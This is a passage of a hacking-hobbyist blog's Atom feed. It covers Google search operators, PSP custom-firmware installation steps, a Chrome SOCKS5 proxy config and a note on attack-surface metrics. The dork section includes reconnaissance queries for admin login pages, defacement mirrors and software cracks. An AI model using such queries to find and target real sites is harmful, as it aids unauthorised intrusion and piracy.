ranges between 10 to 20.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Link:&lt;/b&gt;&lt;br /&gt;link:www.microsoft.com&lt;br /&gt;This query will display you, what ever the page that is linked with the site www.microsoft.com.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Related:&lt;/b&gt;&lt;br /&gt;related:www.warez.com&lt;br /&gt;What ever the websites that looks similar in contents or related to each other will be displayed as a result of this query.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Cache:&lt;/b&gt;&lt;br /&gt;cache:www.ethicaluniversity.com&lt;br /&gt;We can use this cache operator also as a proxy, because once we use this cache operator, Google will be acting as a proxy that stay in middle of the source and the destination.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Site:&lt;/b&gt;&lt;br /&gt;site:www.ethicaluniversity.com&lt;br /&gt;Site operator can be used to search whatever that is been indexed in a website.&lt;br /&gt;now this will reveals a lot about this site that got indexed in its server.&lt;br /&gt;&lt;br /&gt;allinanchor: Both the link and the allinanchor operator does the same thing, where allinanchor search for keywords that is enclosed in the anchor tag.                                                                                            allinanchor:login&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Stocks:&lt;/b&gt;&lt;br /&gt;stocks:icici&lt;br /&gt;Using this stocks operator, you can get the current stock details.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Safesearch:&lt;/b&gt;&lt;br /&gt;When SafeSearch is turned on, sites and web pages containing pornography and explicit sexual content are blocked from search results. Many Google users prefer not to have adult sites included in their search results. Google’s SafeSearch screens for sites that contain this type of information and eliminates them from search results.                                                                                                                                        safesearch: keygens + cracks&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Phonebook:&lt;/b&gt;&lt;br /&gt;This operator will allow you to search phone numbers that Google consider them for quick reference.&lt;br /&gt;phonebook: Disney CA&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Info:&lt;/b&gt;&lt;br /&gt;This operator cannot be used along with other Google operator.&lt;br /&gt;This can be used for viewing information that Google knows about your site.&lt;br /&gt;info:www.yahoo.com&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Filetype:&lt;/b&gt;&lt;br /&gt;You can narrow down your search using this filetype operator, if you are seacrhing for a file of specific type.&lt;br /&gt;filetype:pdf “Networks”&lt;br /&gt;This will fetch you some PDF documents or E-Books related to networking.&lt;br /&gt;&lt;br /&gt;Google currently supports the following filetypes:&lt;br /&gt;&amp;nbsp;txt, doc, pdf, ps, wk1, wk2, wk3, wk4, wk5, wki, wks, wku, lwp, mw, xls, ppt, wks, wps, wdb, wri, rtf, swf, ans, xml, cpp, java, torrent and so on.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Ext:&lt;/b&gt;&lt;br /&gt;This is similar to the filetype operator.                                                                                                               ext:pdf “Networks”&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Define:&lt;/b&gt;&lt;br /&gt;If you want to use Google like a Dictionary finding out for meaning or the definitions, you can use the define operator.&amp;nbsp;define:hacking&lt;br /&gt;&lt;br /&gt;&lt;b&gt;allintext:&lt;/b&gt;&lt;br /&gt;This is somewhat similar to the normal search that most of them do often, you can search for a specific term in google, and can use more number of words enclosed with quotes.                                                 allintext:defaced mirror&lt;br /&gt;&lt;br /&gt;&lt;b&gt;intitle:&lt;/b&gt;&lt;br /&gt;This operator performs search by looking upon the text that is enclosed in the title tag.                 intitle:”admin login”&lt;br /&gt;&lt;br /&gt;&lt;b&gt;allintitle:&lt;/b&gt;&lt;br /&gt;You can use only one argument while using the intitle operator, where as you can throw more than one in allintitle operator.                                                                                                                                intitle:”admin login” “webmaster login” “administrator”&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Location:&lt;/b&gt;&lt;br /&gt;You can search contents only from selected country websites by specifying the location using the location operator.&lt;br /&gt;inurl:admin.asp location:india&lt;br /&gt;This will fetch you pages that contain admin.asp in its URL and will be from India.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Source:&lt;/b&gt;&lt;br /&gt;You can narrow down the search by restricting the source. you can specify the source as a popular E-zines, aricles and even publishers.&lt;br /&gt;“Network Security” source:tata mcgraw hill&lt;br /&gt;This will fetch you results for “Network Security” related topics that was published by tata McGraw Hill publications.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Weather:&lt;/b&gt;&lt;br /&gt;weather:chennai                                                                                                                                                    This will return you the weather in chennai. likewise you can look for your city.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Conversions:&lt;/b&gt;&lt;br /&gt;&amp;nbsp;you can convert to or from Degrees and Radians using Google.&lt;br /&gt;&lt;br /&gt;Number Bases&lt;br /&gt;&lt;br /&gt;in hex&lt;br /&gt;&lt;br /&gt;in binary&lt;br /&gt;&lt;br /&gt;in octal&lt;br /&gt;&lt;br /&gt;in decimal&lt;br /&gt;&lt;br /&gt;Speed, time and distance conversions&lt;br /&gt;&lt;br /&gt;20mph in kph&lt;br /&gt;&lt;br /&gt;2 month in minutes&lt;br /&gt;&lt;br /&gt;420 kelvin in celsius&lt;br /&gt;&lt;br /&gt;5 fahrenheit in celsius&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7306732139129025494-6232259196097979923?l=shaolininteger.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://shaolininteger.blogspot.com/feeds/6232259196097979923/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7306732139129025494&amp;postID=6232259196097979923' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/6232259196097979923'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/6232259196097979923'/><link rel='alternate' type='text/html' href='http://shaolininteger.blogspot.com/2010/10/google-dork.html' title='Google Dork'/><author><name>Slash The Underground</name><uri>http://www.blogger.com/profile/11809812496786804883</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_zPPJaS3LoQM/SYlLqQUM6OI/AAAAAAAAAlo/gG3dNEYX_Dc/S220/17012009021.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_0UUC-pmWcyE/THw11aypljI/AAAAAAAAAC4/0C1YIVSh_rI/s72-c/google+hacking.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7306732139129025494.post-7498219036493787364</id><published>2010-09-08T11:09:00.012+08:00</published><updated>2010-09-08T11:34:08.122+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Procedure'/><title type='text'>PSP slim Hack's</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_zPPJaS3LoQM/TIb-180mz_I/AAAAAAAAAqM/FMrdIWyEkNA/s1600/psp_hacks.gif" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" height="200" src="http://2.bp.blogspot.com/_zPPJaS3LoQM/TIb-180mz_I/AAAAAAAAAqM/FMrdIWyEkNA/s200/psp_hacks.gif" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;b&gt;&lt;u&gt;Procedure for firmware 5.03 or below &lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpFirst" style="margin-left: 0.25in; text-indent: -0.25in;"&gt;1.&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;Update firmware to version 5.03. If the firmware already installed, skip this step.&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin-left: 0.25in; text-indent: -0.25in;"&gt;2.&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;Download and install official firmware version 5.03.&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin-left: 0.25in; text-indent: -0.25in;"&gt;3.&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;Download and install chickHEN R2.&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin-left: 0.25in; text-indent: -0.25in;"&gt;4.&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;Download and install PSPIdent v0.4 or latest.&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin-left: 0.25in; text-indent: -0.25in;"&gt;5.&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;Continue based on which motherboard you have:&lt;/div&gt;&lt;br /&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin-left: 0.75in; text-indent: -0.25in;"&gt;&lt;b&gt;a.&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/b&gt;For TA-085, TA-085v2, TA-088v1, TA-088v2 or TA-090v1 motherboard:&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin-left: 1.25in; text-indent: -1.25in;"&gt;&lt;b&gt;&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;i.&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/b&gt;Install custom firmware. The most current are:&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin-left: 1.75in; text-indent: -0.25in;"&gt;&lt;span style="font-family: Wingdings;"&gt;§&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;5.00 M33-6&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin-left: 1.75in; text-indent: -0.25in;"&gt;&lt;span style="font-family: Wingdings;"&gt;§&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;5.50 GEN-D3&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin-left: 1.75in;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin-left: 0.75in; text-indent: -0.25in;"&gt;&lt;b&gt;b.&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/b&gt;For TA-088v3 (Partially Hackable) motherboard:&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin-left: 1.25in; text-indent: -1.25in;"&gt;&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;i.&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;Install partial custom firmware ONLY. The most current are:&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin-left: 1.75in; text-indent: -0.25in;"&gt;&lt;span style="font-family: Wingdings;"&gt;§&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;CFWEnabler 3.60&lt;/div&gt;&lt;div class="MsoListParagraphCxSpLast" style="margin-left: 1.75in; text-indent: -0.25in;"&gt;&lt;span style="font-family: Wingdings;"&gt;§&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;5.03 GEN-C&lt;/div&gt;&lt;br /&gt;&lt;div class="MsoListParagraphCxSpLast" style="margin-left: 1.75in; text-indent: -0.25in;"&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;b&gt;&lt;u&gt;Procedure for firmware above 5.03:&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpFirst" style="margin-left: 0.25in; text-indent: -0.25in;"&gt;1.&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;Buy/make a Pandora battery &amp;amp; Magic Memory Stick.&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin-left: 0.25in; text-indent: -0.25in;"&gt;2.&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;Without the Pandora battery inserted, insert the Magic Memory Stick.&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin-left: 0.25in; text-indent: -0.25in;"&gt;3.&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;Hold "L" shoulder button and insert the Pandora battery. &lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin-left: 0.25in; text-indent: -0.25in;"&gt;4.&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;The green LED light near the power switch should light up.&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin-left: 0.25in; text-indent: -0.25in;"&gt;5.&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;The onscreen instructions should appear.&lt;/div&gt;&lt;div class="MsoListParagraphCxSpLast" style="margin-left: 0.25in; text-indent: -0.25in;"&gt;6.&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;Release the "L" shoulder button.&lt;/div&gt;&lt;br /&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;&lt;b&gt;&lt;i&gt;NOTE: If onscreen instructions for installing 5.00 M33-4 appear, then your PSP is COMPLETELY HACKABLE. If nothing appears, then we must assume your PSP is NOT HACKABLE. Follow the remaining steps accordingly.&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="MsoListParagraphCxSpFirst" style="margin-left: 0.75in; text-indent: -0.25in;"&gt;&lt;b&gt;&lt;i&gt;a.&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/i&gt;&lt;/b&gt;TA-085, TA-085v2, TA-088v1, TA-088v2 or TA-090v1 (Completely Hackable) motherboard:&lt;/div&gt;&lt;br /&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin-left: 1.25in; text-indent: -1.25in;"&gt;&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;i.&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;Follow the onscreen instructions to install 5.00 M33-4.&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin-left: 1.25in; text-indent: -1.25in;"&gt;&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;ii.&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;Ensure M33-4 are completely installed.&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin-left: 1.25in; text-indent: -1.25in;"&gt;&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;iii.&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;Install 5.50 GEN-D3 or 5.00 M33-6 through Hellcat's Recovery Flasher.&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin-left: 1.25in;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin-left: 0.75in; text-indent: -0.25in;"&gt;&lt;b&gt;&lt;i&gt;b.&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/i&gt;&lt;/b&gt;TA-088v3 (Not Hackable)&lt;/div&gt;&lt;div class="MsoListParagraphCxSpLast" style="margin-left: 0.75in;"&gt;Sit and wait.&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7306732139129025494-7498219036493787364?l=shaolininteger.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://shaolininteger.blogspot.com/feeds/7498219036493787364/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7306732139129025494&amp;postID=7498219036493787364' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/7498219036493787364'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/7498219036493787364'/><link rel='alternate' type='text/html' href='http://shaolininteger.blogspot.com/2010/09/psp-slim-hacks.html' title='PSP slim Hack&apos;s'/><author><name>Slash The Underground</name><uri>http://www.blogger.com/profile/11809812496786804883</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_zPPJaS3LoQM/SYlLqQUM6OI/AAAAAAAAAlo/gG3dNEYX_Dc/S220/17012009021.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_zPPJaS3LoQM/TIb-180mz_I/AAAAAAAAAqM/FMrdIWyEkNA/s72-c/psp_hacks.gif' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7306732139129025494.post-6974956926017887702</id><published>2010-06-17T23:08:00.001+08:00</published><updated>2010-06-18T16:51:55.224+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='uDc'/><title type='text'>Google Chrome socks5</title><content type='html'>&lt;div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_zPPJaS3LoQM/TBszdR6ib9I/AAAAAAAAAqE/wun2wIf9rDs/s1600/CVR_TryToRemember2_s.gif" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="200" src="http://1.bp.blogspot.com/_zPPJaS3LoQM/TBszdR6ib9I/AAAAAAAAAqE/wun2wIf9rDs/s200/CVR_TryToRemember2_s.gif" width="133" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;1. Paste and save to CAP filetype e.g. my-socks.cap&lt;/div&gt;&lt;div&gt;function FindProxyForURL(url, host) { return "SOCKS5 localhost:8080"; }&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;2. Configure Proxy Switchy - Auto config URL:&amp;nbsp;file:///D:/security/proxy-tunnel/ucsc-tunnel.cap&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;3. Done&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7306732139129025494-6974956926017887702?l=shaolininteger.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://shaolininteger.blogspot.com/feeds/6974956926017887702/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7306732139129025494&amp;postID=6974956926017887702' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/6974956926017887702'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/6974956926017887702'/><link rel='alternate' type='text/html' href='http://shaolininteger.blogspot.com/2010/06/google-chrome-socks5.html' title='Google Chrome socks5'/><author><name>Slash The Underground</name><uri>http://www.blogger.com/profile/11809812496786804883</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_zPPJaS3LoQM/SYlLqQUM6OI/AAAAAAAAAlo/gG3dNEYX_Dc/S220/17012009021.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_zPPJaS3LoQM/TBszdR6ib9I/AAAAAAAAAqE/wun2wIf9rDs/s72-c/CVR_TryToRemember2_s.gif' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7306732139129025494.post-5091926027475857741</id><published>2010-05-25T21:12:00.003+08:00</published><updated>2010-05-25T21:16:42.649+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Security'/><category scheme='http://www.blogger.com/atom/ns#' term='News'/><title type='text'>SECURITY METRICS - Attack Surface Metrics</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_zPPJaS3LoQM/S_vNLYKgjZI/AAAAAAAAAp8/h3aNmKusVTs/s1600/osstmm_blue_200.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="200" src="http://3.bp.blogspot.com/_zPPJaS3LoQM/S_vNLYKgjZI/AAAAAAAAAp8/h3aNmKusVTs/s200/osstmm_blue_200.jpg" width="189" /&gt;&lt;/a&gt;&lt;/div&gt;Operational security metrics are the metrics we are most familiar with in our lives. When we measure the height, width, or length of an object we are using an operational metric. When we write the date, have a birthday, or ask the score of a game we are using operational metrics. An operational metric is a constant measurement that informs us of a factual count in relation to the physical world we live in.&lt;br /&gt;&lt;br /&gt;They are operational because they are numbers we can work with consistently from day to day and person to person. It is difficult to work with relative or inconsistent measurements like choosing a specific hue of yellow to paint a room, starting work at sunrise, having the right flavor of strawberry for a milkshake, or preparing for the next threat to affect your organization’s profits because the factors have many variables which are biased or frequently changing between people, regions, customs, and locations.&lt;br /&gt;&lt;br /&gt;For this reason, many professions attempt to standardize such things like flavors, colors, and work hours. This is done through reductionism, a process of finding the elements of such things and building them up from there by quantifying those elements. This way, colors become frequencies, work hours become hours and minutes, flavors become chemical compounds, and an attack surface becomes porosity, controls, and limitations. So we can now quantify the attack surface as "ravs".&lt;br /&gt;&lt;br /&gt;Details at &lt;a href="http://www.isecom.org/research/ravs.shtml"&gt;ISECOM &lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7306732139129025494-5091926027475857741?l=shaolininteger.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://shaolininteger.blogspot.com/feeds/5091926027475857741/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7306732139129025494&amp;postID=5091926027475857741' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/5091926027475857741'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/5091926027475857741'/><link rel='alternate' type='text/html' href='http://shaolininteger.blogspot.com/2010/05/security-metrics-attack-surface-metrics.html' title='SECURITY METRICS - Attack Surface Metrics'/><author><name>Slash The Underground</name><uri>http://www.blogger.com/profile/11809812496786804883</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' 